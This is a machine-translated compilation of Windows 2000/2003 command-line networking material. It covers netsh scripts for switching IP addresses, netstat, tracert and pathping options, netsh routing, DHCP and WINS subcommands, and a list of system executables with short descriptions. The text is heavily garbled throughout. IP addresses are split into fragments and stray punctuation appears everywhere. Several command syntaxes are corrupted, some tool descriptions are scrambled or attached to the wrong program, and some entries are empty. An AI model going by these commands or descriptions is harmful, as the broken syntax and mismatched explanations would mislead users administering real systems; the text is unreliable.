IP Address。. : 10. .1 .1.. .94 (local connection changes before the ip).
Subnet Mask. .: 255. .255. .255. .0. .
Default Gateway 。. : 10. .1 .1.. .254.
C: \> netsh (enter setting mode). .
netsh>interface 。.
interface> ip. .
Interface ip set address > local area connection "static .1 .1 10... .111 255. .255. .255. .0 .1 .1 10... .254.
interface ip> exit. .
Set command earlier in this paper are as follows: more detailed explanation.
set address - set the specified interface IP address and default gateway. .
Set dns-DNS server mode and address.
set wins - set the WINS server mode and addresses. .
C:\ > ipconfig (change with ipconfig command to look, to confirm whether the change is successful).
Windows 2000 IP Configuration. .
Ethernet adapter local area connection:.
Connection-specific DNS Suffix. .:. .
IP Address。. : 10. .1 .1.. .111.
Subnet Mask. .: 255. .255. .255. .0. .
Default Gateway 。. : 10. .1 .1.. .254.
Classic command-line network (4). .
--------------------------------------------------------------------------------。.
Command list. .
-Moves to the previous context level.
? - Display list of commands. .
Aaaa-changes to the aaaa '' context would.
abort - discarded in the offline mode changes. .
Add-Add a configuration item to add to the project list.
alias - add an alias. .
Bye-exit the program.
commit - presented in the offline mode changes. .
Delete-Deletes the item list for a configuration item.
dhcp - Changes to `dhcp''context. .
Dump-displays a configuration script.
exec - run a script file. .
Exit-exit the program.
help - Displays command list. .
Changes to the interface-interface '' context would.
offline - set off the current model. .
Online-sets the current mode to online.
popd - open a context from the stack. .
Pushd-pushes current context on stack.
quit - exit the program. .
Ras-change into ras ' context would.
routing - Changes to the `routing''context. .
Set-update configuration settings.
show - display information. .
To delete an alias unalias-.
wins - Changes to the `wins''context. .
Quick switch IP addresses are unique.
In the course of the encounter in a different segment in the case of network debugging is often need to machine in several different IP addresses in the switch. Changes in the Win2000 operating system IP address has been much more convenient than Win98 because End IP address change does not require restarting the computer , but also access to the network property is set in the instructions. Is there another easy way to do a little, such as clicking with the mouse double-click the shortcut on the IP address of the switch can be achieved?. .
The answer is Yes. Win2000 with Netsh commands can achieve this functionality. First, enter the command line mode (start → run ", type" cmd "," enter the command line mode) at the prompt, type netsh to enter the netsh interface. Then type int ip access interface IP configuration mode, type dump lists interface IP configuration information:.
C: \ Documents and Settings \ Administrator> netsh. .
netsh>。.
netsh> int ip. .
interface ip>dump。.
# ----------------------------------。 .
# Interface IP configuration.
# ----------------------------------。 .
pushd interface ip。.
# "Local connection" interface IP configuration (Note: The following shows the specific machine, as the case may be). .
Set address name = "local area connection" source = static addr = 192. .168. .0. .5 mask = 255. .255. .255. .0.
set address name = "Local Area Connection" gateway = 192. .168. .0. .2 Gwmetric = 1. .
Set dns name = "local area connection" source = static addr = 61. .181 .17 .237... ".
add dns name = "Local Area Connection" addr = 211. .97. .168. .129. .
Add dns name = "local area connection" addr = 211. .1 .4 .98... ".
set wins name = "Local Area Connection" source = static addr = none. .
# "Local area connection 2 interface IP configuration.
set address name = "Local Area Connection 2" source = dhcp. .
Set dns name = "local area connection 2" source = dhcp.
set wins name = "Local Area Connection 2" source = dhcp. .
popd。.
# Interface IP Configuration ended. .
Quick switch IP addresses are unique 2.
Now we can generally understand that IP address with netsh command to change the way through the "set address name = connection name (connection name to use quotation marks) source = static addr = IP address mask = subnet mask" to achieve. .
To the command line mode using netsh directly try. For example, to set the machine's IP address to 192. .168. .0. .7, the subnet mask is 255. .255. .255. .0, you can do the following:.
C: \ Documents and Settings \ Administrator> netsh. .
netsh>int ip。.
interface ip> set address name = "Local Area Connection" source = static addr = 192. .168. .0. .7 Mask = 255. .255. .255. .0. .
To confirm the change.
interface ip> exit. .
Then check with the ipconfig command:.
C: \ Documents and Settings \ Administrator> ipconfig. .
Windows 2000 IP Configuration。.
Ethernet adapter Local Area Connection 2 . .
Media State 。. Cable Disconnected。.
Ethernet adapter Local Area Connection . .
Connection-specific DNS Suffix 。. 。.
IP Address. . 192. .168. .0. .7. .
Subnet Mask 。. 255。.255。.255。.0。.
Default Gateway. . 192. .168. .0. .2. .
From the above display, you can see has been successfully implemented in Win2000 with command line to change the IP address. In this way change IP addresses have not even working in the graphical interface coming soon. However, we then use a script to help a hand from the victory goal. Start by opening Notepad, enter the following:.
int ip. .
Set address name = "local area connection" source = static addr = 192. .168. .0. .7 mask = 255. .255. .255. .0.
Then saved as a file named "7.. Sh" file, put it under the root directory C, and then enter the command line mode, the root directory of the C type "netsh exec 7.. Sh", if no response ah? But then ipconfig look, you will find over the IP address has changed. .
Then use Notepad to write a batch file that is named ".bat" 7. for the "netsh exec 7. .sh". For the file in the create a shortcut on the desktop, double-click the shortcut for quick change of the IP address. If you want to quickly .168.192. .5, .0.192. .168. .0. the same network segment as .7 IP address between words, you only need to change the "addr" address, but IP address will be changed to as 172. .19. .96. . .
int ip。.
set address name = "Local Area Connection" source = static addr = 172. .19. .96. .7 Mask = 255. .255. .255. .0. .
Set address name = "local area connection" gateway = 172. .19. .96. .1 gwmetric = 1.
Similarly to the above, save the script file, and then made the implementation of what the batch file, use ipconfig / all command inspection, I learned, including information, including the gateway also changes coming. This is not a quick and easy, IP address to change to change?. .
Use netstat displays connection statistics.
You can use netstat command to display protocol statistics and current TCP / IP connection. netstat-a command will show all connections, and netstat-r display routing tables and active connections. netstat-e command displays Ethernet statistics, and netstat-s shows statistics for each protocol. If you use netstat-n, the address and port number can not be converted into the name. .
Tracert (trace route) is the route tracing utility that is used to determine the IP datagram access destination path. Tracert command uses IP time to live (TTL) field and ICMP error messages to determine from one host to another host on the network routing.
-D specifies the IP address does not resolve the host name. .
-H maximum_hops Specifies the metric to track called target_name host routing.
-J host-list specifies Tracert utility packets used in the path of the router interface to the list. .
-W timeout waiting for the timeout for each time you reply to the specified number of milliseconds.
target_name target host name or IP address. .
Pathping command is a route tracing tool, it will ping and tracert commands, and these two tools are not available in conjunction with other information. Pathping command will send the packet to reach the final destination path for each router, and then the results based on the computer from each hop. Because the command displays the packet in any given router or link, the extent of the loss, so you can easily determine the possible cause network problems which routers or links.
-N Hostnames do not resolve the address into host name. .
-H Maximum hops the search target maximum number of hops.
-G Host-list list of the release of source routing along the route. .
-P Period in ping the number of milliseconds to wait between.
-Q Num_queries the number of queries per hop. .
-W Time-out for each return the number of milliseconds to wait.
-T Layer 2 tag to layer 2 priority tag (for example, for IEEE 802. .1 P) to connect to the data packet and sends it to the path of each network device. This helps to identify not properly configured layer 2 priority of network equipment. -T switch is used to test the quality of service (QoS) connectivity. .
-R RSVP test Che check to determine the path of each router supports "Resource Reservation Protocol (RSVP)," this Protocol allows a host to the data flow to retain a certain amount of bandwidth. The-r switch is used to test the quality of service (QoS) connectivity.
At the command prompt using the DHCP commands interactively. .
Open a command prompt.
Type netsh. .
At the netsh > (Netshell) command prompt, type "dhcp".
In the dhcp> (DHCP auxiliary program) command prompt, you want to manage the server, type server [url = file: / / servername /] file: / / servername / [/ url] or server ip_address. .
Once you have the right to administer the server successfully connect, you will see a "you can on server servername for read and write access".
Once connected, you can use any support for DHCP Netshell command. Type /? Or help to display the DHCP directly or as a sub-command menu options display, type the list out with DHCP for use with all Netshell subcommand. .
Route command.
routing ip add / delete / set / show interface in the specified interface to add, delete, or display of conventional IP routing configuration settings. .
Routing ip add/delete/set/show filter to the specified interface adds, deletes, configures, or displays the IP packet filters.
routing ip add / delete / show boundary in the specified interface to add, delete or display the multicast boundary setting. .
Routing ip add/set ipiptunnel add or configure IP-in-IP interfaces.
routing ip add / delete / set / show rtmroute add, configure or display the routing table does not continue routing manager. .
Routing ip add/delete/set/show persistentroute adds, deletes, configures, or displays a continuous route.
routing ip add / delete / set / show preferenceforprotocol add, delete, configure or display the priority of routing protocols. .
Routing ip add/delete/set/show scope to add, delete, or display the multicast scope.
routing ip set / show loglevel configuration or display the global IP record levels. .
Routing ip show all IP helper displays the Netsh utility sub environment.
routing ip show protocol shows all running IP routing protocols. .
Routing ip show mfe displays multicast forwarding entries.
routing ip show mfestats display multicast forwarding the survey. .
Routing ip show boundarystats displays IP multicast boundaries.
routing ip show rtmdestinations show route table routing table manager in the target. .
Routing ip show rtmroutes displays route table manager in the routing table.
routing ip nat set / show global configuration or display the global network address translation (NAT) settings. .
Routing ip nat add/delete/set/show interface adds, deletes, configures, or displays the specified interface of the NAT settings.
routing ip nat add / delete addressrange interfaces in the NAT pool of public addresses to add or delete an address range. .
Routing ip nat add/delete addressmapping adds or deletes a NAT address mapping.
routing ip nat add / delete portmapping add or remove NAT port mapping. .
Routing ip autodhcp set/show global configures or displays global DHCP allocator parameters.
routing ip autodhcp set / show interface interface configuration or display the specified set DHCP allocator. .
Routing ip autodhcp add/delete exclusion in a range of addresses that the DHCP allocator in Add or remove an exclusion range.
routing ip dnsproxy set / show global configuration or display the global DNS proxy parameters. .
Routing ip dnsproxy set/show interface configures or displays the specified interface of the DNS proxy parameters.
routing ip igmp set / show global IGMP configuration or display the global settings. .
Routing ip igmp add/delete/set/show interface in the specified interface adds, deletes, configures, or displays IGMP.
routing ip igmp add / delete staticgroup add or delete the specified interface, the static multicast group. .
Routing ip igmp show grouptable shows the IGMP hosts group table.
routing ip igmp show ifstats show IGMP statistics for each interface. .
Routing ip igmp show iftable shows each interface IGMP host groups.
routing ip igmp show proxygrouptable display IGMP proxy interface IGMP group table. .
Routing ip igmp show rasgrouptable displays the remote access server uses the Internet interface of the Group of tables.
routing ip ospf set / show global show global OSPF configuration or settings. .
Routing ip ospf add/delete/set/show interface in the specified interface adds, deletes, configures, or displays OSPF.
routing ip ospf add / delete / set / show area to add, delete, configure or display OSPF area. .
Routing ip ospf add/delete/show range in the specified OSPF area adds, deletes, configures, or displays of coverage.
routing ip ospf add / delete / set / show virtif add, delete, configure or display OSPF virtual interface. .
Routing ip ospf add/delete/show neighbor adds, deletes, configures, or displays OSPF neighbors.
routing ip ospf add / delete / show protofilter add, delete, configure or display the routing OSPF external routing information sources. .
Routing ip ospf add/delete/show routefilter adds, deletes, configures, or displays OSPF route filter external routes.
routing ip ospf show areastats display OSPF area statistics. .
Routing ip ospf show lsdb Displays OSPF link state database.
routing ip ospf show virtifstats display OSPF virtual link statistics. .
Routing ip relay set global configuration "DHCP relay agent global settings the program".
routing ip relay add / delete / set interface in the specified interface to add, delete, or configure the "DHCP Relay Agent" setting. .
Routing ip relay add/delete dhcpserver in DHCP server address list in the Add or remove the IP address of the DHCP server.
routing ip relay show ifbinding display interface IP address binding. .
Routing ip relay show ifconfig show ifstats "DHCP relay agent" in the configuration.
routing ip relay show ifstats display DHCP statistics for each interface. .
Routing ip rip set/show global configuration IP RIP global settings.
routing ip rip add / delete / set / show interface in the specified IP interface to add or configure the RIP settings. .
Routing ip rip add/delete peerfilter adds or removes a RIP peer filters.
routing ip rip add / delete acceptfilter receiving the routing list to add or remove RIP routing filter. .
Routing ip rip add/delete announcefilter announced the routing list, add or remove RIP route filters.
routing ip rip add / delete / show neighbor add or remove RIP neighbors. .
Routing ip rip set/show flags for a specified interface IP RIP is configured on the advanced settings.
routing ip rip show globalstats display global RIP parameters. .
Routing ip rip show ifbinding displays IP address bindings for an interface.
routing ip rip show ifstats display RIP statistics for each interface. .
IPX netsh routing commands.
routing ipx add / set staticroute in the IPX routing table to add or configure a static IPX route. .
Add/set ipx routing staticservice in the SAP service table to add or configure a static SAP services.
routing ipx add / set filter on the specified interface to add or configure the IPX packet filters. .
Add/ipx routing interface in the set demand-dial interfaces enable IPX routing, or IPX settings configured on the interface.
routing ipx set global configuration global IPX routing settings. .
Ipx rip routing add/set filter to add and configure RIP route filters.
routing ipx rip set global configuration global IPX's RIP settings. .
Ipx rip routing set interface on a specified interface to configure IPX RIP settings.
routing ipx sap add / set filter to add or configure the SAP service filters. .
Ipx sap routing set global configuration global IPX SAP settings.
routing ipx sap set interface configuration in the specified IPX's SAP interface settings. .
Ipx routing netbios add nbname static IPX NETBIOS name to the NetBIOS name table.
routing ipx netbios set interface to configure the specified interface, the IPX-based NetBIOS settings. .
NetSh commands for WINS.
WINS list lists all available commands. .
Dump the WINS server configuration is dumped to the command output.
add name registered in the name of the server. For more information, please enter add name /?. .
Add partner adds a replication partner to the server. For more information, please enter add partner/?.
add pngserver Add the current server's Persona Non Grata list of servers. For more information, please enter the add pngserver /?. .
Check database check database consistency. For more information, please enter check database/?.
check name check a WINS server, the name of the record list. For more information, please enter the check name /?. .
Check version number consistency version check. For more information, please enter check version/?.
delete name removed from the server database, the name has been registered. For more information, please enter the delete name /?. .
Delete partner from the list to delete a replication partner. For more information, please enter delete partner/?.
delete records deleted from the server or logical delete all records or a group of records. For more information, please enter the delete records /?. .
Delete list to delete the owner and its owners. For more information, please enter delete owners/?.
delete pngserver removed from the list all or selected Persona Non Grata servers. For more information, please enter the delete pngserver /?. .
Init backup to back up the WINS database. For more information, please enter backup/? init.
init import file to import data from Lmhosts. For more information, please enter the init import /?. .
Init pull the trigger to start a "pull" and sent to another WINS server. For more information, please enter init pull/?.
init pullrange start another WINS server, a group of records, and read the record. For more information, please enter the init pullrange /?. .
Init push start "pushing" triggers, and sending to another WINS server. For more information, please enter init push/?.
init replicate replicated database with replication partners. For more information, please enter the init replicate /?. .
Init restore to restore the database from the file. For more information, please enter init restore/?.
init scavenge the WINS database, remove the server. For more information, please enter the init scavenge /?. .
Init search search server, the WINS database. For more information, please enter a search/? init.
reset statistics reset the server statistics. For more information, please enter the reset statistics /?. .
Set automatic autopartnerconfig set server replication partner configuration information. For more information, please enter set autopartnerconfig/?.
set backuppath set server backup parameters. For more information, please enter the set backuppath /?. .
Setting the server's set burstparam burst handling parameters. For more information, please enter set autopartnerconfig/?.
set logparam set database and event logging options. For more information, please enter the set logparam /?. .
Setting the server's set migrateflag migration flag. For more information, please enter set migrateflag/?.
set namerecord interval and set the server timeout. For more information, please enter the set namerecord /?. .
Setting the server's set periodicdbchecking regularly check parameters for the database. For more information, please enter set periodicdbchecking/?.
set pullpartnerconfig set designated "pull" configuration parameters partners. For more information, please enter the set pullpartnerconfig /?. .
Sets a specified set pushpartnerconfig "pushing" partner configuring parameters. For more information, please enter set pushpartnerconfig/?.
set pullparam set the default server "pull" parameter. For more information, please enter the set pullparam /?. .
Set sets the server default pushparam "pushing" parameter. For more information, please enter set pushparam/?.
set replicateflag set the server copy flag. For more information, please enter the set replicateflag /?. .
Set startversion Sets the database ID of the starting version. For more information, please enter set startversion/?.
show browser shows all the activities the domain master browser [1Bh] records. For more information, please enter the show browser /?. .
Show database displays the specified server's database and records. For more information, please enter the show database/?.
show info display configuration information. For more information, please enter the show info /?. .
Display the server name in the show detailed information for a particular record. For more information, please enter the name/show?.
show partner shows the server "pull" or "push" (or "push-pull") partner. For more information, please enter the show partner /?. .
Show default partner configuring partnerproperties display. For more information, please enter show partnerproperties/?.
show pullpartnerconfig Show "pull" partner configuration information. For more information, please enter the show pullpartnerconfig /?. .
Show pushpartnerconfig show "pushing" partner configuration information. For more information, please enter show pushpartnerconfig/?.
show reccount display the specified number of records owned by the server. For more information, please enter the show reccount /?. .
Show recbyversion displays the specified server. For more information, please enter show recbyversion/?.
show server show the currently selected server. For more information, please enter the show server /?. .
Show statistics show WINS server statistics. For more information, please enter show statistics/?.
show version display the current version of the WINS server, the counter value. For more information, please enter the show version /?. .
Show versionmap displays the owner ID to "maximum version number mapping". For more information, please enter show versionmap/?.
Interface command. .
Interface set/show interface enabled, disabled, connect, disconnect, and display the configuration for demand-dial interface.
interface set / show credentials in the demand-dial interface to configure or display the user name, password and domain name. .
--------------------------------------------------------------------------------。.
Network classic command line (5). .
--------------------------------------------------------------------------------。.
Network classic command line (5) FOR Windows 2k/2003 Server, Win2000 command complete works. .
accwiz。.exe > Accessibility Wizard for walking you through setting up your machine for your mobility needs。. Accessibility Wizard.
acsetups. . Exe> ACS setup DCOM server executable. .
Actmovie. .exe setup tool > Direct Show directly display the install tool.
append. . Exe> Allows programs to open data in specified directories as if they were in the current directory. . Allows the program to open the development of directory data. .
Arp. .exe and modify > NETWORK Display Hardware IP-addresses to display and change the computer's IP and physical hardware addresses.
at. . Exe> AT is a scheduling utility also included with UNIX programs to run tasks. .
atmadm。.exe > Displays statistics for ATM call manager。. ATM Call Manager statistics.
attrib. . Exe> Display and modify attributes for files and folders to display and change file and folder attributes. .
Autochk. Used to .exe > check and repair Windows File Systems detect repair the file system.
autoconv. . Exe> Automates the file system conversion during reboots automatically during the startup process transformation system. .
Autofmt. .exe file format > Automates the process during reboots during the startup process formatting process.
autolfn. . Exe> Used for formatting long file names using the long file name format. .
bootok。.exe > Boot acceptance application for registry 。.
bootvrfy. . Exe> Bootvrfy. . Exe, a program included in Windows 2000 that notifies the system that startup was successful. . Bootvrfy. . Exe can be run on a local or remote computer. . Bulletin started successfully. .
cacls。.exe > Displays or modifies access control lists (ACLs) of files。. Display and edit the ACL.
calc. . Exe> Windows Calculators Calculator. .
Cdplayer. Windows .exe > CD Player CD player.
change. . Exe> Change (User | Port | Logon) and Terminal Server-related inquiries. .
Charmap. .exe > Character Map character map.
chglogon. . Exe> Same as using "Change Logon" activate or deactivate a session record. .
Chgport. Same as .exe > using "Change Port" change port (Terminal Services).
chgusr. . Exe> Same as using "Change User" to change the user (terminal services). .
Chkdsk. Check the .exe > hard disk for errors similar to Scandisk 3 Stages must specify a Drive Letter disk utility.
chkntfs. . Exe> Same as using chkdsk but for NTFS NTFS disk testing procedures. .
Cidaemon. .exe > Component of Ci Filer Service composition Ci document services.
cipher. . Exe> Displays or alters the encryption of directories [files] on NTFS partitions. . To display or change the NTFS encrypted files or directories. .
Cisvc. Index-.exe > Content-the content indexing service It''s for I indexed content.
ckcnv. . Exe> Cookie Convertor transform Cookie. .
Cleanmgr. > Disk Cleanup .exe, popular with Windows 98 disk cleanup.
cliconfg. . Exe> SQL Server Client Network Utility SQL client network tools. .
Clipbrd. .exe > Local Clipboard viewer will allow for you to connect to other clipboards ClipBook Viewer.
clipsrv. . Exe> Start the clipboard Server runs Clipboard services. .
Clspack. .exe > CLSPACK used to create a file listing of system packages build system files listing.
cluster. . Exe> Display a cluster in a domain shows the domain of the cluster. .
cmdl32. . Exe> Connection Manager Auto-Download Connection Manager automatically downloaded. .
Cmmgr32. .exe > Connection Manager connection manager.
cmmon32. . Exe> Connection Manager Monitor Connection Manager Monitor. .
Cmstp. Connection Manager .exe > Profile Manager in the Connection Manager profile installer.
comclust. . Exe> about cluster server cluster. .
comp。.exe > ComClust Add, Remove, or Join a cluster。. Compare two files and file sets content *.
Conime. Console .exe > IME IME console.
control. . Exe> Starts the control panel control panel. .
Convert. Convert File .exe > System conversion to NTFS file system to NTFS.
convlog. . Exe> Converts MS IIS log files convert IIS log file format to NCSA format. .
Cprofile. converts .exe > Copy profiles display mode.
cscrīpt. . Exe> MS Windows scrīpts Host Version 5. .1 Version than the host. .
Csrss. > Client Server Runtime .exe Process client server Runtime process.
csvde. . Exe> Comma Separated Variable Import / Export Utility to format conversion. .
Dbgtrace. > Terminal Server .exe and..
dcomcnfg. . Exe> Display the current DCOM configuration. . DCOM Configuration Properties. .
dcphelp。.exe > ? 。.
dcpromo. . Exe> Promote a domain controller to ADSI AD Installation Wizard. .
Ddeshare. .exe DDE shares > Display on local or remote computer DDE shares.
ddmprxy. . Exe>. .
debug。.exe > Runs Debug, a program testing and editing tool。. Is DEBUG!.
dfrgfat. . Exe> Defrag FAT file system FAT partition Disk Defragmenter. .
Dfrgntfs. .exe file system > Defrag NTFS NTFS partition Disk Defragmenter.
dfs_cmd_. . Exe> configures a Dfs tree configure a DFS tree. .
Dfsinit. .exe File > Distributed System Initialization distributed file system initialization.
dfssvc. . Exe> Distributed File System Server Distributed File System servers. .
MS diantz. .exe > Cabinet Maker to make the cab file.
diskperf. . Exe> Starts physical Disk Performance counters disk performance counters. .
dllhost。.exe > dllhost is used on all versions of Windows 2000。. dllhost is the hedost process for all COM+ applications。. All the COM + application software is the primary process.
dllhst3g. . Exe>. .
Dmadmin. Disk Manager Service .exe > disk management service.
dmremote. . Exe> Part of disk management disk management part of the service. .
dns。.exe > DNS Applications DNS 。.
doskey. . Exe> recalls Windows command lines and creates macros create macro command line. .
Dosx. .exe > DOS Extender DOS Extender.
dplaysvr. . Exe> Direct Play Helper direct run to help. .
Drwatson. > Dr Watson .exe for 2000 Fault Detector Dr. Watson error detection.
drwtsn32. . Exe> Dr Watson for 2000 viewer and configuration manager Dr Watson display and configuration management. .
dtcsetup。.exe > Installs MDTC 。.
dvdplay. . Exe> Windows 2000 DVD player DVD player. .
Dxdiag. .exe > Direct-X Diagnostics Direct-X diagnostic tool.
edlin. . Exe> line-oriented text editor. . Command line text editor (ah long history!). .
.Exe > esentutl. MS MS database tools Database Utility.
eudcedit. . Exe> Private character editor Ture Type Characters and procedures. .
Eventvwr. .exe Windows 2000 Event Viewer > Event Viewer.
evnt_cmd_. . Exe> Event to trap translator; Configuration tool. .
evntwin。.exe > Event to trap translator setup 。.
exe2bin. . Exe> Converts EXE to binary format converted EXE file to binary. .
> Expand expand. .exe Files that have been compressed extract.
extrac32. . Exe> CAB File extraction utility solution CAB tool. .
fastopen。.exe > Fastopen tracks the location of files on a hard disk and stores the information in memory for fast access。. Quick access to the hard disk in memory.
faxcover. . Exe> Fax Cover page editor fax cover editor. .
Faxqueue. .exe > Display Fax Queue displays the fax queue.
faxsend. . Exe> Fax Wizard for sending faxes send fax wizard. .
Faxsvc. fax server Starts .exe > to start the fax service.
fc. . Exe> Compares two files or sets of files and their differences to compare two different files. .
> Searches find. .exe for text string in a file or files to find line of text in the file.
findstr. . Exe> Searches for strings in files Find lines in the file. .
> Fingers finger. .exe and displays a user statistics on that user Finger a user and display the results.
fixmapi. . Exe> Fix mapi files fix MAPI file. .
Flattemp. Enable or disable .exe > temporally directories allow or disable the use of temporary files directory.
fontview. . Exe> Display fonts in a font file display font file fonts. .
forcedos。.exe > Forces a file to start in dos mode。. Force the file to run in DOS mode.
freecell. . Exe> Popular Windows Game FreeCell. .
Ftp://ftp. > File Transfer .exe/Protocol used to transfer files over a network connection is FTP.
gdi. . Exe> Graphic Device Interface GUI-driven. .
grovel。.exe > 。.
grpconv. . Exe> Program Manager Group Convertor conversion program administrators group. .
> Displays help. .exe for Windows 2000 commands help displays help.
hostname. . Exe> Display hostname for machine. . Show machine Hostname. .
Ie4uinit. .exe > Install IE5 User tool IE5 users to install tools.
ieshwiz. . Exe> Customize folder wizard Custom Folder Wizard. .
Iexpress. .exe setup > Create and install packages for wear parts installation package.
iisreset. . Exe> Restart IIS Admin Service restart the IIS service. .
Internat. Language .exe > Keyboard Indicator Applet keyboard language indicator.
ipconfig. . Exe> Windows 2000 IP configuration. . This IP configuration. .
Ipsecmon. .exe > IP Security Monitor IP Security Monitor.
ipxroute. . Exe> IPX Routing and Source Routing Control Program IPX routing and source routing control procedures. .
Irftp. FTP Setup .exe > wireless communication for wireless connection.
ismserv. . Exe> Intersite messaging Service to install or remove the Service Control Manager of the service. .
Jdbgmgr. .exe for java > Microsoft debugger 4 Java4 debugger.
jetconv. . Exe> Convert a Jet Engine Database conversion Jet Engine database. .
jetpack。.exe > Compact Jet Database。. Compressed Jet database.
jview. . Exe> Command-line loader for Java Java command line loader. .
Krnl386. > Core Component for .exe Windows 2000 core components of 2000.
label. . Exe> Change label for drives to change the drive label. .
lcwiz。.exe > License Compliance Wizard for local or remote systems。. License complies with the wizard.
ldifde. . Exe> LDIF cmd line manager LDIF Directory Exchange command line management. .
Licmgr. Terminal Server .exe > License Manager to manage Terminal Services license agreement.
lights. . Exe> display connection status lights show connection status. .
Llsmgr. Windows 2000 .exe > License Manager 2000 license management.
llssrv. . Exe> Start the license Server license server startup. .
lnkstub。.exe > 。.
locator. . Exe> RPC Locator remote positioning. .
Lodctr. perfmon counters > Load .exe call performance counts.
logoff. . Exe> Log current user off. . Cancellation of the user. .
Lpq. status of .exe > Displays a remote LPD queue display remote lpd print queue status display is sent to the server based on Unix printing tasks.
lpr. . Exe> Send a print job to a network printer. . Redirects print jobs to a printer on the network. Unix client printer is typically used to send print jobs to print devices connected to the NT printer server. .
Lsass. LSA and Executable .exe > Server DLL running LSA and Server DLL.
lserver. . Exe> Specifies the new DNS domain for the default server to specify a default DNS Server new domain. .
Macfile. .exe > Used for managing MACFILES MACFILES management.
magnify. . Exe> Used to magnify the current screen magnifier. .
Makecab. > MS Cabinet Maker .exe produced CAB file.
mdm. . Exe> Machine Debug Manager Machine Debug Manager. .
Mem. Display current .exe > Memory stats display memory status.
migpwd. . Exe> Migrate passwords. . Migration password. .
Mmc. Microsoft Management Console .exe > console.
mnmsrvc. . Exe> Netmeeting Remote Desktop Sharing NetMeeting Remote Desktop Sharing. .
mobsync。.exe > Manage Synchronization。. Synchronize Directory Manager.
mountvol. . Exe> Creates, deletes, or lists a volume mount point. . To create, delete, or list volume mount point. .
Mplay32. .exe > MS Media Player Media Player.
mpnotify. . Exe> Multiple Provider Notification application to provide more notified applications. .
mq1sync。.exe > 。.
mqbkup. . Exe> MS Message Queue Backup and Restore Utility message queue backup and recovery tools. .
Mqexchng. .exe Setup > Exchange Connector MSMQ message queue Exchange connection settings.
mqmig. . Exe> MSMQ Migration Utility message queue migration tool. .
mqsvc。.exe > ? 。.
mrinfo. . Exe> Multicast routing using SNMP multicast routing using SNMP. .
Mscdexnt. .exe > Installs MSCD (MS CD Extensions) installation MSCD.
msdtc. . Exe> Dynamic Transaction Controller Console dynamic transaction processing console. .
msg。.exe > Send a message to a user local or remote。. Send a message to a local or remote client.
mshta. . Exe> HTML Application HOST HTML application host. .
Msiexec. .exe Installer Starts Windows > start the Windows Installer Program.
mspaint. . Exe> Microsoft Paint drawing board. .
msswchx。.exe > 。.
mstask. . Exe> Task Schedule Program task schedule program. .
Mstinit. > Task scheduler setup .exe..
narrator. . Exe> Program will allow you to have a narrator for reading. . Microsoft Narrator. .
Nbtstat. .exe and protocol stats > Displays current TCP/IP connections using NBT using NBT (NetBIOS over TCP/IP) display protocol statistics and current TCP/IP connections.
nddeapir. . Exe> NDDE API Server side NDDE API server. .
> Net net. .exe Utility to see detailed usage/?.
net1. . Exe> Net Utility updated version from MS Net upgrade version. .
Netdde. .exe > Network DDE will install itself into the background to install its own in the background.
netsh. . Exe> Creates a shell for network information used to configure and monitor Windows 2000 command-line scripting interface. .
netstat。.exe > Displays current connections。. Display protocol statistics and current TCP/IP network connections.
nlsfunc. . Exe> Loads country-specific information for loading a particular country (region) information. Windows 2000 and MS-DOS subsystem do not use this command. Accept the command only for compatibility with MS-DOS file. .
Notepad. Windows 2000 .exe > Notepad Notepad Opens.
nslookup. . Exe> Displays information for DNS of the domain name system from the diagnostic tool shows (DNS) name server information. .
Ntbackup. Opens the .exe > NT Backup Utility-backup and recovery tools.
ntbooks. . Exe> Starts Windows Help Utility Help. .
Ntdsutil. .exe > maintenance of DB Performs the ADSI complete ADSI DB maintenance.
ntfrs. . Exe> NT File Replication Service NT File Replication Service. .
ntfrsupg。.exe > 。.
ntkrnlpa. . Exe> Kernel patch core patch. .
Ntoskrnl. .exe > Core at the heart of the NT Kernel KT..
ntsd. . Exe>. .
Ntvdm. Simulates a .exe > 16-bit Windows environment simulation of 16-bit Windows environment.
nw16. . Exe> Netware Redirector NetWare redirector. .
Nwscrīpt. .exe running netware scrīpts > runs Netware script.
odbcad32. . Exe> ODBC 32-bit Administrator 32 位 ODBC management. .
Odbcconf. Configure ODBC .exe > driver''s source''s from command and data line command line configuration of the ODBC driver and data source.
os2. . Exe> An OS / 2 Warp Server (os2 / o) OS / 2. .
os2srv。.exe > An OS/2 Warp Server OS/2 。.
os2ss. . Exe> An OS / 2 Warp Server OS / 2. .
Osk. .exe > On Screen Keyboard on-screen keyboard.
packager. . Exe> Windows 2000 Packager Manager Object Packager. .
Pathping. .exe > Combination of Ping and Tracert contains Ping and Tracert procedure.
pax. . Exe> is a POSIX program and path names used as arguments must be specified in POSIX format. . Use "/ / C / Users / Default" instead of "C: \ USERS \ DEFAULT.." Start the portable archive exchange (Pax) utility. .
pentnt。.exe > Used to check the Pentium for the floating point division error。. Check the Pentium floating point error.
perfmon. . Exe> Starts Windows Performance Monitor Performance Monitor. .
Ping. Packet Internet Groper .exe > verify a connection to a remote computer.
posix. . Exe> Used for backward compatibility with Unix for compatible Unix. .
Print. Cmd .exe > line used to print files to print a text file or display the contents of the print queue.
progman. . Exe> Program manager Program Manager. .
proquota。.exe > Profile quota program 。.
psxss. . Exe> POSIX Subsystem Application Posix subsystem applications. .
qappsrv。.exe > Displays the available application terminal servers on the network 。.
-------------------------------------------------- ------------------------------。 .
Network Classic command line (6).
-------------------------------------------------- ------------------------------。 .
Network Classic command line (6) FOR Windows Server 2003 2k/.
Display terminals in the network server program available. .
Qprocess. Display information about .exe > local or remote processes on local or remote displays process information (Terminal Services).
query. . Exe> Query TERMSERVER user process and sessions inquiry process and dialogue. .
Quser. information about .exe > Display a user logged on to display login information (required Terminal Services).
qwinsta. . Exe> Display information about Terminal Sessions. . Display terminal services. .
Rasadmin. Start the .exe > remote access admin service start remote access service.
rasautou. . Exe> Creates a RAS connection to establish a RAS connection. .
Rasdial. Dial a .exe > connection dial-up connection.
rasphone. . Exe> Starts a RAS connection running RAS connection. .
rcp。.exe > Copies a file from and to a RCP service。. On a Windows 2000-based computer and the remote shell daemon running rshd systems copy the files.
rdpclip. . Exe> RdpClip allows you to copy and paste files between a terminal session and client console session. . And then the terminal and the local copy and paste files. .
Recover. information readable .exe > Recovers from a bad or defective disk from a bad or defective disk recovers readable information.
redir. . Exe> Starts the redirector service runs redirection service. .
Regedt32.32-bit register service .exe > 32-bit register service.
regini. . Exe> modify registry permissions from within a scrīpt changes from registration with the script. .
register。.exe > Register a program so it can have special execution characteristics。. Registration contains a special character of the program is running.
regsvc. . Exe>. .
regsvr32。.exe > Registers and unregister''s dll''s。. As to how and where it register''s them I dont know。. Register and the register the DLL.
